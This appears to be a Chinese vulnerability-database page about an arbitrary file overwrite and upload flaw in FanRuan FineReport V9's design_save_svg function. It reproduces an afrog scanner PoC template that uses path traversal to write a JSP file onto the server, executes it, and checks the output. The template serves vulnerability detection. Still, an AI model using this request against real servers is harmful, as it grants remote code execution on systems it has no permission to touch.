fanruan-oa-v9-designsavevg-upload-file: 帆软报表 V9 design_save_svg 任意文件覆盖文件上传

漏洞描述

帆软 V9 存在任意文件覆盖，导致攻击者可以任意文件上传

PoC代码[已公开]

id: fanruan-oa-v9-designsavevg-upload-file

info:
  name: 帆软报表 V9 design_save_svg 任意文件覆盖文件上传
  author: zan8in
  severity: critical
  description: |-
    帆软 V9 存在任意文件覆盖，导致攻击者可以任意文件上传
  tags: finereport,upload,file
  created: 2023/11/14

set:
  rand1: randomLowercase(12)
  r2: randomInt(100,999)
  r3: randomInt(100,999)
rules:
  r0:
    request:
      method: POST
      path: /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp
      headers:
        Content-Type: text/xml;charset=UTF-8
      body: |
        {"__CONTENT__":"<%out.print({{r2}} * {{r3}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>","__CHARSET__":"UTF-8"}
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /WebReport/update.jsp
    expression: response.status == 200 && response.body.bcontains(bytes(string(r2*r3)))
expression: r0() && r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/fanruan-oa-v9-designsavevg-upload-file.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐